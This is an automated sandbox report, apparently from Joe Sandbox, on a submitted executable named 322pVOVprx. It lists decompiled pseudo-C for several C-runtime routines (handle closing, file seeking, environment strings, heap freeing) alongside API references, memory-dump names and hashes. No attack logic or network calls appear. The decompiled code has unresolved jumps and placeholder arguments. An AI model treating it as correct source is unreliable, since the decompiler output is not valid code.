                                                                                                                                                                                                                                                        0x7ff6e5abb115
                                                                                                                                                                                                                                                        0x7ff6e5abb128
                                                                                                                                                                                                                                                        0x7ff6e5abb134
                                                                                                                                                                                                                                                        0x7ff6e5abb140
                                                                                                                                                                                                                                                        0x7ff6e5abb142
                                                                                                                                                                                                                                                        0x7ff6e5abb147
                                                                                                                                                                                                                                                        0x7ff6e5abb14c
                                                                                                                                                                                                                                                        0x7ff6e5abb153
                                                                                                                                                                                                                                                        0x7ff6e5abb15a

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3548387204-0
                                                                                                                                                                                                                                                        • Opcode ID: 4011c0cc7ad8475efb9850599936c3c033b15381ca9ef591f27f0db506bfe258
                                                                                                                                                                                                                                                        • Instruction ID: e4d04614a869ba16f5005119d63682d15831a8b1ee55db16e29c2e4c829557e4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4011c0cc7ad8475efb9850599936c3c033b15381ca9ef591f27f0db506bfe258
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7117C63F0820F46FA94B7B964723BD01815F54B40F440034E94ECA2CBAE6FBC4147AB
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACA028(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                                                                        				long _t29;
                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rsi;
                                                                                                                                                                                                                                                        				_t65 = __rdx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(__edi, __rax);
                                                                                                                                                                                                                                                        				if (__rax != 0xffffffff) goto 0xe5aca04e;
                                                                                                                                                                                                                                                        				goto 0xe5aca0a8;
                                                                                                                                                                                                                                                        				_t51 =  *0xe5afca30; // 0x1e5fc5359a0
                                                                                                                                                                                                                                                        				if (__edi != 1) goto 0xe5aca068;
                                                                                                                                                                                                                                                        				if (( *(_t51 + 0xc8) & dil) != 0) goto 0xe5aca075;
                                                                                                                                                                                                                                                        				if (__edi != 2) goto 0xe5aca08c;
                                                                                                                                                                                                                                                        				if (( *(_t51 + 0x80) & 0x00000001) == 0) goto 0xe5aca08c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(2, _t51);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(1, _t51);
                                                                                                                                                                                                                                                        				if (_t51 == _t51) goto 0xe5aca04a;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(__edi, _t51);
                                                                                                                                                                                                                                                        				_t22 = FindCloseChangeNotification(??); // executed
                                                                                                                                                                                                                                                        				if (_t22 != 0) goto 0xe5aca04a;
                                                                                                                                                                                                                                                        				_t29 = GetLastError();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6E3C(_t23, _t29, __edi, _t51, __ecx, _t65);
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(0xe5afca30 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8)) = 0;
                                                                                                                                                                                                                                                        				if (_t29 == 0) goto 0xe5aca0e3;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4400(_t29, _t65);
                                                                                                                                                                                                                                                        				goto 0xe5aca0e5;
                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                        0x7ff6e5aca028
                                                                                                                                                                                                                                                        0x7ff6e5aca02d
                                                                                                                                                                                                                                                        0x7ff6e5aca03a
                                                                                                                                                                                                                                                        0x7ff6e5aca03f
                                                                                                                                                                                                                                                        0x7ff6e5aca048
                                                                                                                                                                                                                                                        0x7ff6e5aca04c
                                                                                                                                                                                                                                                        0x7ff6e5aca04e
                                                                                                                                                                                                                                                        0x7ff6e5aca05d
                                                                                                                                                                                                                                                        0x7ff6e5aca066
                                                                                                                                                                                                                                                        0x7ff6e5aca06a
                                                                                                                                                                                                                                                        0x7ff6e5aca073
                                                                                                                                                                                                                                                        0x7ff6e5aca075
                                                                                                                                                                                                                                                        0x7ff6e5aca082
                                                                                                                                                                                                                                                        0x7ff6e5aca08a
                                                                                                                                                                                                                                                        0x7ff6e5aca08e
                                                                                                                                                                                                                                                        0x7ff6e5aca096
                                                                                                                                                                                                                                                        0x7ff6e5aca09e
                                                                                                                                                                                                                                                        0x7ff6e5aca0a6
                                                                                                                                                                                                                                                        0x7ff6e5aca0aa
                                                                                                                                                                                                                                                        0x7ff6e5aca0cb
                                                                                                                                                                                                                                                        0x7ff6e5aca0d2
                                                                                                                                                                                                                                                        0x7ff6e5aca0d9
                                                                                                                                                                                                                                                        0x7ff6e5aca0e1
                                                                                                                                                                                                                                                        0x7ff6e5aca0f4

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6E5AC9EA5,?,?,00000000,00007FF6E5AC9F5A), ref: 00007FF6E5ACA096
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6E5AC9EA5,?,?,00000000,00007FF6E5AC9F5A), ref: 00007FF6E5ACA0A0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1687624791-0
                                                                                                                                                                                                                                                        • Opcode ID: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                                                                                                                                                        • Instruction ID: ff21a379b88015a94e34f3b463ec6ab69f192641e535da13d3dcc1afe7d8f184
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 649148bb364a2e2bb6c01b4b98e8ba63ccdb9764b03dbbc10b4a89a301f042aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6219F23B1864241EB509B6DA4743791392AF89FE4F144239DA2ECB7C1CF6EAC45830B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACB604(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rbp;
                                                                                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(__edi, __rax);
                                                                                                                                                                                                                                                        				if (__rax != 0xffffffff) goto 0xe5acb642;
                                                                                                                                                                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 9;
                                                                                                                                                                                                                                                        				goto 0xe5acb698;
                                                                                                                                                                                                                                                        				r9d = r8d;
                                                                                                                                                                                                                                                        				_t22 = SetFilePointerEx(??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                        				if (_t22 != 0) goto 0xe5acb66c;
                                                                                                                                                                                                                                                        				_t24 = E00007FF67FF6E5AC4400(GetLastError(), __r9);
                                                                                                                                                                                                                                                        				goto 0xe5acb63c;
                                                                                                                                                                                                                                                        				if (_v24 == 0xffffffff) goto 0xe5acb63c;
                                                                                                                                                                                                                                                        				 *( *((intOrPtr*)(0xe5afca30 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) =  *( *((intOrPtr*)(0xe5afca30 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) & 0x000000fd;
                                                                                                                                                                                                                                                        				return _t24;
                                                                                                                                                                                                                                                        			}






                                                                                                                                                                                                                                                        0x7ff6e5acb604
                                                                                                                                                                                                                                                        0x7ff6e5acb609
                                                                                                                                                                                                                                                        0x7ff6e5acb60e
                                                                                                                                                                                                                                                        0x7ff6e5acb626
                                                                                                                                                                                                                                                        0x7ff6e5acb62f
                                                                                                                                                                                                                                                        0x7ff6e5acb631
                                                                                                                                                                                                                                                        0x7ff6e5acb635
                                                                                                                                                                                                                                                        0x7ff6e5acb640
                                                                                                                                                                                                                                                        0x7ff6e5acb642
                                                                                                                                                                                                                                                        0x7ff6e5acb650
                                                                                                                                                                                                                                                        0x7ff6e5acb658
                                                                                                                                                                                                                                                        0x7ff6e5acb665
                                                                                                                                                                                                                                                        0x7ff6e5acb66a
                                                                                                                                                                                                                                                        0x7ff6e5acb675
                                                                                                                                                                                                                                                        0x7ff6e5acb693
                                                                                                                                                                                                                                                        0x7ff6e5acb6ac

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF6E5ACB79D), ref: 00007FF6E5ACB650
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF6E5ACB79D), ref: 00007FF6E5ACB65A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                                                                                                                                                        • Instruction ID: ca370deb05c08ce1571d13b7b3688ff920946b690f06feb57fe9d2e85b8b477b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F11B262B18B8181DB109B29E4242696761AF45FF4FA44331EEBDCB7D9CF3ED8118709
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AD1B7C(signed int __rax, long long __rbx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                                                                                                                                                                                                        				signed long long _t25;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a8 = __rbx;
                                                                                                                                                                                                                                                        				_a16 = __rbp;
                                                                                                                                                                                                                                                        				_a24 = __rsi;
                                                                                                                                                                                                                                                        				GetEnvironmentStringsW();
                                                                                                                                                                                                                                                        				if (__rax == 0) goto 0xe5ad1c03;
                                                                                                                                                                                                                                                        				if ( *__rax == 0) goto 0xe5ad1bc2;
                                                                                                                                                                                                                                                        				_t25 = (__rax | 0xffffffff) + 1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rax + _t25 * 2)) != 0) goto 0xe5ad1bac;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rax + _t25 * 2 + 2)) != 0) goto 0xe5ad1ba8;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ACCACC(_t25, (__rax + _t25 * 2 + 2 - __rax + 2 >> 1) + (__rax + _t25 * 2 + 2 - __rax + 2 >> 1)); // executed
                                                                                                                                                                                                                                                        				if (_t25 == 0) goto 0xe5ad1bf0;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABBB60();
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9E18(_t25, _t25);
                                                                                                                                                                                                                                                        				return FreeEnvironmentStringsW(??);
                                                                                                                                                                                                                                                        			}




                                                                                                                                                                                                                                                        0x7ff6e5ad1b7c
                                                                                                                                                                                                                                                        0x7ff6e5ad1b81
                                                                                                                                                                                                                                                        0x7ff6e5ad1b86
                                                                                                                                                                                                                                                        0x7ff6e5ad1b90
                                                                                                                                                                                                                                                        0x7ff6e5ad1b9e
                                                                                                                                                                                                                                                        0x7ff6e5ad1ba6
                                                                                                                                                                                                                                                        0x7ff6e5ad1bac
                                                                                                                                                                                                                                                        0x7ff6e5ad1bb3
                                                                                                                                                                                                                                                        0x7ff6e5ad1bc0
                                                                                                                                                                                                                                                        0x7ff6e5ad1bd2
                                                                                                                                                                                                                                                        0x7ff6e5ad1bdd
                                                                                                                                                                                                                                                        0x7ff6e5ad1be8
                                                                                                                                                                                                                                                        0x7ff6e5ad1bf2
                                                                                                                                                                                                                                                        0x7ff6e5ad1c17

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6E5AC8082,?,?,00000000,00007FF6E5AC8576,?,?,?,?,00007FF6E5AD0524,?,?,00000000), ref: 00007FF6E5AD1B90
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6E5AC8082,?,?,00000000,00007FF6E5AC8576,?,?,?,?,00007FF6E5AD0524,?,?,00000000), ref: 00007FF6E5AD1BFA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3328510275-0
                                                                                                                                                                                                                                                        • Opcode ID: 5ece351e8429a440899ae525739603223d66e156de119f1672d4644cccae46b7
                                                                                                                                                                                                                                                        • Instruction ID: 7eb68382c26bb5e9db5759c842bf3ea6aa85bc7963b3ba8b1033722873e34202
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ece351e8429a440899ae525739603223d66e156de119f1672d4644cccae46b7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E101A513F0875581EA20BF29642016963A0AF54FE4B8C4230DF6D977C9DE2DEC428749
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AC4891), ref: 00007FF6E5AC49AF
                                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AC4891), ref: 00007FF6E5AC49C5
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                                        • Opcode ID: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                                                                                                                                                        • Instruction ID: 44ebc132421e154db5bc8445e6151056a8d0a711b19080ce0a3cc78d89027942
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B211987370C65281E7549B19A42123AB760EF85B71F500239E69EC55D8EF2DD444CB09
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AC6801), ref: 00007FF6E5AC69A7
                                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E5AC6801), ref: 00007FF6E5AC69BD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                                        • Opcode ID: 1d02911a82879df930b91fc915557220ec32c277741baff5be31943c493d896d
                                                                                                                                                                                                                                                        • Instruction ID: 19152f701e5add4a3642f8b982bbe594563511f49dbc002bba694cb91807acf6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d02911a82879df930b91fc915557220ec32c277741baff5be31943c493d896d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE01703360C25182D7509F19A41137AB7B0FF45B21F600236E6A9CA5E8DF3ED854DB06
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC9E18(intOrPtr* __rax, void* __rcx) {
                                                                                                                                                                                                                                                        				int _t1;
                                                                                                                                                                                                                                                        				intOrPtr _t3;
                                                                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				if (__rcx == 0) goto 0xe5ac9e53;
                                                                                                                                                                                                                                                        				_t14 =  *0xe5afd270; // 0x1e5fc520000, executed
                                                                                                                                                                                                                                                        				_t1 = HeapFree(_t11, ??); // executed
                                                                                                                                                                                                                                                        				if (_t1 != 0) goto 0xe5ac9e4e;
                                                                                                                                                                                                                                                        				_t3 = E00007FF67FF6E5AC4370(GetLastError(), __rax, _t14, __rcx);
                                                                                                                                                                                                                                                        				_t4 = E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = _t3;
                                                                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                        0x7ff6e5ac9e1b
                                                                                                                                                                                                                                                        0x7ff6e5ac9e27
                                                                                                                                                                                                                                                        0x7ff6e5ac9e2e
                                                                                                                                                                                                                                                        0x7ff6e5ac9e36
                                                                                                                                                                                                                                                        0x7ff6e5ac9e40
                                                                                                                                                                                                                                                        0x7ff6e5ac9e47
                                                                                                                                                                                                                                                        0x7ff6e5ac9e4c
                                                                                                                                                                                                                                                        0x7ff6e5ac9e53

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlReleasePrivilege.NTDLL(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E2E
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6E5AD1E42,?,?,?,00007FF6E5AD1E7F,?,?,00000000,00007FF6E5AD2345,?,?,?,00007FF6E5AD2277), ref: 00007FF6E5AC9E38
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1334314998-0
                                                                                                                                                                                                                                                        • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                                                                                                                                                        • Instruction ID: 09035a055093b8f903c148dc05142699e67dccf5fae1ac6327add897d0e1a17a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
